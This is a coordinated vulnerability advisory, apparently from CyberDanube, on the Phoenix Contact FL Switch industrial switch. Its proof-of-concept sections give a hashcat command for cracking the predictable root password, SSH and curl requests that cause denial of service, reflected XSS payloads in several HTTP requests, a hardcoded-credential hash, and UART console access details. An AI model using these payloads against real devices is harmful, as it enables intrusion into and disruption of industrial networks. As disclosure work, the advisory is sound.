Multiple Vulnerabilities in Phoenix Contact FL Switch

The Phoenix Contact FL Switch is prone to multiple vulnerabilities. Weak password generation, flaws in web and SSH services, and reflected XSS issues allow attackers to bypass authentication, disrupt services via denial-of-service conditions, and execute malicious code in a user’s browser. Additionally, hardcoded credentials and an exposed UART port enable direct interaction with the underlying operating system when physical access is available, impairing critical system functions.

Vendor description

“Connecting, distributing, and controlling power and data flows – we have been developing the right products for this purpose since 1923. Whether in industrial production facilities, in the field of renewable energies, in infrastructure, or for complex device connections: our solutions are used wherever processes must run automatically. Above and beyond their pure function, they help our partners to develop sustainable applications with more efficient processes and reduced costs.

We are Phoenix Contact: With innovative products and solutions, we are paving the way to a climate-neutral and sustainable world.”

Source: https://www.phoenixcontact.com/en-us/company

Vulnerable versions

Tested on FL SWITCH 2306-2SFP PN version 3.40

Find more information about affected products on the VDE Cert website: https://certvde.com/de/advisories/VDE-2025-071

Vulnerability overview

1) Weak/Predictable root Password (CVE-2025-41692)
The device’s root password is generated with weak a weak ruleset. An attacker with access to the administration password can bruteforce it in seconds. The “password” part of the password is equal to the password set in the web interface.

2) Authenticated Denial-of-Service via SSH (CVE-2025-41693)
The device is vulenrable to a denial of service condition when ssh is enabled. An authenticated attacker can exploit this issue to make the device unresponsive

3) Authenticated Denial-of-Service via Webshell (CVE-2025-41694)
The webshell is vulnerable to a denial of service condition. An authenticated attacker can exploit this issue to make the webserver unresponsive.

4) Multiple Reflected Cross-Site Scripting Vulnerabilities (CVE-2025-41695, CVE-2025-41745 – CVE-2025-41752)
Multiple GET and POST requests can be used to trigger reflected cross-site scripting vulnerabilities. This can be used to execute malicious code in the context of a user’s browser. Cookies may be also stoled via this way.

5) Hardcoded User Password (CVE-2025-41696)
The device’s “user” account has weak hardcoded credentials. An attacker with physical access could abuse this to gain serial access.

6) Access to UART Console (CVE-2025-41697)
The device exposes a UART console on the PCB, which allows an attacker to interact with the Linux operating system. Based on vulnerability 5), an
attacker can login with hardcoded credentials to the system. This attack requires physical access.

Proof of Concept

1) Weak/Predictable root Password (CVE-2025-41692)

The root password is generated using the mask “<pw>\*[0-9][8]”. The following hashcat configuration can be used to calculate the password if administration credentials are known.

hashcat -m 500 -a 3 hash.txt password*?d?d?d?d?d?d?d?d --force
$1$Y8/euSU2$l42H5Fox4UvOIwt4cCyUL1:password*92016123 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 500 (md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5))
Hash.Target......: $1$Y8/euSU2$l42H5Fox4UvOIwt4cCyUL1
Time.Started.....: Mon Apr 14 13:25:20 2025, (3 secs)
Time.Estimated...: Mon Apr 14 13:25:23 2025, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: password*?d?d?d?d?d?d?d?d [17]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 121.3 kH/s (59.56ms) @ Accel:4 Loops:250 Thr:256 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 399360/100000000 (0.40%)
Rejected.........: 0/399360 (0.00%)
Restore.Point....: 368640/100000000 (0.37%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:750-1000
Candidate.Engine.: Device Generator
Candidates.#1....: password*13636123 -> password*62273232
Hardware.Mon.#1..: Temp: 69c Util:100% Core: 210MHz Mem: 405MHz Bus:16

A possible password would be “SuperStrongPassword*92016123”. It is generated from the combination of the web interface password (SuperStrongPassword) and the appended asterisk plus the eight digit number. The password is newly generated on each new start of the device.

2) Authenticated Denial-of-Service via SSH (CVE-2025-41693)

The dropbear is modified by the manufacturer. When using the ssh feature to execute commands directly after login, the process stays open and uses resources. After ~6 connections the device becomes unresponsive.

attacker$ ssh <known_user>@<IP> echo DOS
switch$ top
Mem: 62024K used, 62996K free, 0K shrd, 0K buff, 21576K cached
CPU: 13% usr 86% sys 0% nic 0% idle 0% io 0% irq 0% sirq
Mem: 63016K used, 62004K free, 0K shrd, 0K buff, 21576K cached
CPU: 12% usr 86% sys 0% nic 0% idle 0% io 0% irq 0% sirq
Load average: 6.97 3.47 1.44 7/190 1393
PID PPID USER STAT VSZ %VSZ CPU %CPU COMMAND
1163 1162 root R 6896 6% 0 14% /usr/bin/pxc_cli -ssh
1246 1244 root R 6896 6% 0 14% /usr/bin/pxc_cli -ssh
1294 1293 root R 6896 6% 0 14% /usr/bin/pxc_cli -ssh
1233 1232 root R 6896 6% 0 14% /usr/bin/pxc_cli -ssh
1255 1254 root R 6896 6% 0 14% /usr/bin/pxc_cli -ssh
1385 1384 root R 6892 6% 0 14% /usr/bin/pxc_cli -ssh
1121 1093 apache S 24752 20% 0 7% /usr/bin/php -c /dev/shm/php.ini
842 1 root S 877m 718% 0 6% /usr/bin/pxc_mona -o

3) Authenticated Denial-of-Service via Webshell (CVE-2025-41694)

When the webshell receives an empty command with a whitespace, the server blocks until it receives more data, resulting in an dos condition.

$ curl "http://192.168.19.143/php/command.php?usr=admin&pwd=password&cmd=%20"

$ curl -vv "http://192.168.19.143/php/command.php?usr=admin&pwd=password&cmd=%20"
* Trying 192.168.19.143:80...
* Connected to 192.168.19.143 (192.168.19.143) port 80
> GET /php/command.php?usr=admin&pwd=password&cmd=%20 HTTP/1.1
> Host: 192.168.19.143
> User-Agent: curl/8.5.0
> Accept: */*

4) Multiple Reflected Cross-Site Scripting Vulnerabilities (CVE-2025-41695, CVE-2025-41745 – CVE-2025-41752)

The reflected cross-site scripting vulnerabilities can be triggered by using the following POST requests. Dyn Conn Example (CVE-2025-41695):

POST /php/dyn_conn.php HTTP/1.1
Host: 192.168.19.143
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=<redacted>
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
objSave=%3Cscript%3Ealert(document%2elocation)%3C/script%3E

Port Cntr Example (CVE-2025-41745):

POST /php/pxc_portCntr2.php HTTP/1.1
Host: 192.168.19.143
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=<redacted>
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
btn_clear=1&activeTab=1"></script><script>alert(document.location)</script><script>

Port Sec Example (CVE-2025-41746):

POST /php/pxc_portSecCfg.php HTTP/1.1
Host: 192.168.19.143
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=<redacted>
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 98
portSelect=1%22%3E%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E%3Cscript%3E

Vlan Intf Example (CVE-2025-41747):

POST /php/pxc_vlanIntfCfg.php HTTP/1.1
Host: 192.168.19.143
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=<redacted>
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
btn_apply=1&activeInf=1%22%3E%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E%3Cscript%3E

GET Requests for triggering XSS:

(CVE-2025-41748)

http://192.168.19.143/php/pxc_Dot1xCfg.php?port=1%22%3E%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E%3Cscript%3E

(CVE-2025-41749)

http://192.168.19.143/php/port_util.php?portSelect=1%22%3E%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E%3Cscript%3E

(CVE-2025-41750)

http://192.168.19.143/php/pxc_PortCfg.php?port=1%22%3E%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E%3Cscript%3E

(CVE-2025-41751)

http://192.168.19.143/php/pxc_portCntr.php?port=1%22%3E%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E%3Cscript%3E

(CVE-2025-41752)

http://192.168.19.143/php/pxc_portSfp.php?port=1%22%3E%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E%3Cscript%3E

5) Hardcoded User Password (CVE-2025-41696)

The shadow file shows the hardcoded credential of “user”. The hash corresponds to the password “user”.

$ cat /etc/shadow
[...]
mailman:!!:11851:0:99999:7:::
mysql:!!:11851:0:99999:7:::
ldap:!!:11851:0:99999:7:::
pvm:!!:11851:0:99999:7:::
user:$1$pJefShJL$CoX8T20vn1g.ug0jZIczM.:11851:0:99999:7:::

6) Access to UART Console (CVE-2025-41697)

Two vias next to the “LC125A Quadruple Bus Buffer Gate” on a edge of the PCB are exposing the RxD and TxD UART pins. These pins can be intefaced with a UART-to-USB converter via its RxD and TxD pins. The needed settings are 38400 Baud, 1n8 at 3.3 Volt.

Solution

Update to the latest available firmware (3.50 and newer).

Workaround

Restrict network access to the device.

Recommendation

Apply patches immediately.

Conducted in Collaboration

This research was conducted in cooperation with VERBUND OT Cyber Security Lab during a penetration test.

Contact Timeline

2025-07-17: Sent advisory to Phoenix Contact PSIRT.
2025-07-29: Vendor asked for a call to clarify the vulnerabilities.
2025-07-31: Aligned on timeline for September during call.
2025-08-19: Vendor confirmed publications for 2025-10-14. Confirmed the shift.
2025-09-25: Asked the vendor for another call to clarify details regarding all affected devices (including other advisories).
2025-09-26: Talked to vendor to clarify details.
2025-10-09: Asked for CVE Numbers. Received and included them in the advisory.
2025-10-14: Coordinated publication of security advisory.
2025-11-18: Phone call with Phoenix Contact; shifted publishing date to 2025-12-09 due to discussions with CERT@VDE regading risk rating.
2025-12-09: Received CVE numbers for XSS vulnerabilities from Phoenix Contact.
2025-12-15: Coordinated release of security advisory.

Author(s)

Thomas Weber

Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool > MEDUSA < has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM(international). Nowadays, he brings his competence and experience into security products.

Sebastian Dietz

Sebastian Dietz is a Security Researcher at CyberDanube. His research focuses on digital twins, information security risk assessment and firmware analysis. Currently, he is working on developing the firmware emulation Framework MEDUSA. Sebastian has already proven his technical expertise at various CTFs such as the „Austrian Cyber Security Challenge“, where he has won in his category with an impressive number of points.

David Blagojevic

David Blagojevic is a Security Researcher at CyberDanube. He is currently engaged in offensive security engagements, doing pentests & research activities within the fields of firmware emulation & analysis, where he is contributing to the development and advancement of the MEDUSA Firmware Emulation Framework. He is currently a part-time masters student of computer science at TU Wien (Vienna University of Technology).

Felix Koroknai

Felix Koroknai is a Security Researcher at CyberDanube. Active in offensive security and firmware research, performing pentests across network (IT/OT) infrastructure, web stacks & embedded (I)IoT platforms/devices. Contributor to the MEDUSA Firmware Emulation Framework and currently a part-time student of computer science at TU Wien (Vienna University of Technology).